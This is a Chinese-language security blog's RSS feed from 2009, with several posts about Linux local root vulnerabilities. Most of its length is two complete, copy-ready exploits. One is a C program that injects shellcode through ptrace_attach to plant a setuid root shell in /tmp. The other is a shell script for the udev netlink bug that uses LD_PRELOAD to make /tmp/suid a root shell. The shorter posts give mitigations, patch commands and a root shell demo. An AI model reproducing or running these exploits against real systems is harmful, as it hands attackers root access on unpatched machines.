<![CDATA[许诺's Blog - Linux相关]]> http://www.swhack.cn/ zh-cn PBlog2 v2.4 许诺's Blog http://www.swhack.cn/images/logos.gif http://www.swhack.cn/ 许诺's Blog http://www.swhack.cn/article.asp?id=133 <![CDATA[Linux Kernel 2.6.x ptrace_attach Local Privilege ]]> 251812239@qq.com(许诺) Wed,13 May 2009 10:32:40 +0800 http://www.swhack.cn/default.asp?id=133 ----------------------------
素包子:
素包子快速的看了下漏洞利用程序,原理应该是通过 ptrace挂到一个suid root程序上,然后利用ptrace_attach函数的漏洞,以root权限执行指令,产生/tmp/.exp这个local root shell。不幸中的万幸,这个exp写的稍微有点问题,在REDHAT里需要稍作修改才能成功获得root权限。
素包子提供几个临时解决方案以供大家选择(以下方案由简至难):
1、禁用本地所有普通用户账号,直到发布补丁。此方案无法防止有webshell的黑客获得root权限。
2、禁用系统所有的suid root程序,直到发布补丁。此方案会导致系统部分功能无法正常使用。
3、安装sptrace LKM禁用普通用户使用ptrace。此方案对业务影响相对较小,但实施较为复杂。
----------------------------
noop:
漏洞并不是本来存在于ptrace里面的,而是因为在2.6.29中引入了cred_exec_mutex互斥对象,但是使用的时候lock错了对象造成的。所以2.6.29以下版本不要去动脑筋了,没用的。


复制内容到剪贴板程序代码 程序代码
/*
ptrace_attach privilege escalation exploit by s0m3b0dy

  • tested on Gentoo 2.6.29rc1

    grataz:
    Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...

    email: s0m3b0dy1 (at) gmail.com
    */

    #include <grp.h>
    #include <stdio.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <paths.h>
    #include <string.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/wait.h>
    #include <sys/stat.h>
    #include <sys/param.h>
    #include <sys/types.h>
    #include <sys/ptrace.h>
    #include <sys/socket.h>
    char shellcode
    • [] =
    "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
    "\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
    "echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
    struct user_regs_struct322 {
            unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
            unsigned short ds, __ds, es, __es;
            unsigned short fs, __fs, gs, __gs;
            unsigned long orig_eax, eip;
            unsigned short cs, __cs;
            unsigned long eflags, esp;
            unsigned short ss, __ss;
    };

    main()
    {
    struct user_regs_struct322  regs;
    struct stat buf;
    int i,o;
    unsigned long * src;
    unsigned long * dst;
    char *env[2];
    env[0]="/usr/bin/gpasswd";  // some suid file
    env[1]=0;
    if((o=fork()) == 0)
    {
    execve(env[0],env,0);
    exit(0);
    }
    if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
    {
    printf("\n[-] Attach\n");
    exit(0);
    }
    wait((int *)0);
    if (ptrace(PTRACE_GETREGS, o, NULL, ®s) == -1){
                    printf("\n[-] read registers\n");
            exit(0);
    }
    printf( "[+] EIP - 0x%08lx\n", regs.eip);
    dst= (unsigned long *) regs.eip;
    src = (unsigned long *) shellcode;
    for(i=0;i<sizeof(shellcode) -1;i+=4)
    if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
                           printf("\n[-] write shellcode\n");
                exit(0);
    }
    ptrace(PTRACE_CONT, o, 0, 0);
    ptrace(PTRACE_DETACH,o,0,0);
    printf("[+] Waiting for root...\n");
    sleep(2);
    if(!stat("/tmp/.exp",&buf))
    {
    printf("[+] Executing suid shell /tmp/.exp...\n");
    execv("/tmp/.exp",0);
    }
    else
    {
    printf("[-] Damn no r00t here :(\n");
    }
    return 0;
    }
    ]]>         http://www.swhack.cn/article.asp?id=137 <![CDATA[Linux爆本地提权漏洞 请立即更新udev程序]]> 251812239@qq.com(许诺) Fri,24 Apr 2009 10:47:16 +0800 http://www.swhack.cn/default.asp?id=137 Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)
    修复方法(修复前请备份重要数据):


    debian用户请执行apt-get update ; apt-get upgrade -y

    centos用户请执行yum update udev

    RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。

    攻击效果展示:
    libuuid@debian:~$ sh a 890
    sh-3.1# id
    uid=0(root) gid=0(root) groups=105(libuuid)
    sh-3.1# cat /etc/debian_version
    lenny/sid
    sh-3.1# dpkg -l | grep udev
    ii  udev                              0.114-2               /dev/ and hotplug management daemon

    现在确认的是此攻击方式对Debian和Ubuntu相当有效,对RedHat的攻击效果有待确认。

    最新战况请查阅 http://baoz.net/linux-udev-exploit/

    ]]>         http://www.swhack.cn/article.asp?id=136 <![CDATA[udev,linux有史以来最危险的本地安全漏洞]]> 251812239@qq.com(许诺) Fri,24 Apr 2009 10:45:29 +0800 http://www.swhack.cn/default.asp?id=136
    这个漏洞对各大企业的安全人员发起挑战,我们的软件资产管理系统是否有足够的数据支撑我们做下面的事情?

    1、给哪些系统打补丁?
    2、哪些系统已经打上了补丁?
    3、新上线的系统打了补丁了吗?如何发现?


    几个主流发行版已经发布了新的udev程序以修复这个问题,不幸中的万幸是修复这个漏洞不需要重启,对业务系统的影响相对小了很多。

    我已确认受影响系统:

    RHEL 5.X x86和x64
    Debian 4.x 5.x x86和x64

    最后不得不说一句,各位看官的跳板机赶紧升级,此时此刻最危险的就是它。grsecurity帮我们规避了这次风险,即使没打补丁,黑客也无法利用此漏洞获得root权限,cool!看来非高压的关键业务系统部署高级安全策略还是值得的。

    udev[11037]: segfault at 0 ip ac6b949b sp b7f7ae98 error 4 in libc-2.5.so[ac68c000+13e000]
    udev[11370]: segfault at 0 ip 9b80c49b sp b120c868 error 4 in libc-2.5.so[9b7df000+13e000]

    ]]>         http://www.swhack.cn/article.asp?id=134 <![CDATA[Linux Kernel 2.6 UDEV 本地提权]]> 251812239@qq.com(许诺) Mon,20 Apr 2009 10:35:14 +0800 http://www.swhack.cn/default.asp?id=134
    复制内容到剪贴板程序代码 程序代码
    #!/bin/sh
    # Linux 2.6
    # bug found by Sebastian Krahmer
    #
    # lame sploit using LD technique
    # by kcope in 2009
    # tested on debian-etch,ubuntu,gentoo
    # do a 'cat /proc/net/netlink'
    # and set the first arg to this
    # script to the pid of the netlink socket
    # (the pid is udevd_pid - 1 most of the time)
    # + sploit has to be UNIX formatted text :)
    # + if it doesn't work the 1st time try more often
    #
    # WARNING: maybe needs some FIXUP to work flawlessly
    ## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

    cat > udev.c << _EOF
    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <dirent.h>
    #include <sys/stat.h>
    #include <sysexits.h>
    #include <wait.h>
    #include <signal.h>
    #include <sys/socket.h>
    #include <linux/types.h>
    #include <linux/netlink.h>

    #ifndef NETLINK_KOBJECT_UEVENT
    #define NETLINK_KOBJECT_UEVENT 15
    #endif

    #define SHORT_STRING 64
    #define MEDIUM_STRING 128
    #define BIG_STRING 256
    #define LONG_STRING 1024
    #define EXTRALONG_STRING 4096
    #define TRUE 1
    #define FALSE 0

    int socket_fd;
    struct sockaddr_nl address;
    struct msghdr msg;
    struct iovec iovector;
    int sz = 64*1024;

    main(int argc, char **argv) {
            char sysfspath[SHORT_STRING];
            char subsystem[SHORT_STRING];
            char event[SHORT_STRING];
            char major[SHORT_STRING];
            char minor[SHORT_STRING];

            sprintf(event, "add");
            sprintf(subsystem, "block");
            sprintf(sysfspath, "/dev/foo");
            sprintf(major, "8");
            sprintf(minor, "1");

            memset(&address, 0, sizeof(address));
            address.nl_family = AF_NETLINK;
            address.nl_pid = atoi(argv[1]);
            address.nl_groups = 0;

            msg.msg_name = (void*)&address;
            msg.msg_namelen = sizeof(address);
            msg.msg_iov = &iovector;
            msg.msg_iovlen = 1;

            socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
            bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

            char message[LONG_STRING];
            char *mp;

            mp = message;
            mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
            mp += sprintf(mp, "ACTION=%s", event) +1;
            mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
            mp += sprintf(mp, "MAJOR=%s", major) +1;
            mp += sprintf(mp, "MINOR=%s", minor) +1;
            mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
            mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

            iovector.iov_base = (void*)message;
            iovector.iov_len = (int)(mp-message);

            char *buf;
            int buflen;
            buf = (char *) &msg;
            buflen = (int)(mp-message);

            sendmsg(socket_fd, &msg, 0);

            close(socket_fd);

        sleep(10);
        execl("/tmp/suid", "suid", (void*)0);
    }

    _EOF
    gcc udev.c -o /tmp/udev
    cat > program.c << _EOF
    #include <unistd.h>
    #include <stdio.h>
    #include <sys/types.h>
    #include <stdlib.h>

    void _init()
    {
    setgid(0);
    setuid(0);
    unsetenv("LD_PRELOAD");
    execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
    }

    _EOF
    gcc -o program.o -c program.c -fPIC
    gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
    cat > suid.c << _EOF
    int main(void) {
           setgid(0); setuid(0);
           execl("/bin/sh","sh",0); }
    _EOF
    gcc -o /tmp/suid suid.c
    cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
    /tmp/udev $1
    ]]>         http://www.swhack.cn/article.asp?id=135 <![CDATA[天阳论坛整理的各个版本linux溢出集合]]> 251812239@qq.com(许诺) Thu,15 Jan 2009 10:40:46 +0800 http://www.swhack.cn/default.asp?id=135 http://bbs.tian6.com/linux_exp/index.htm]]>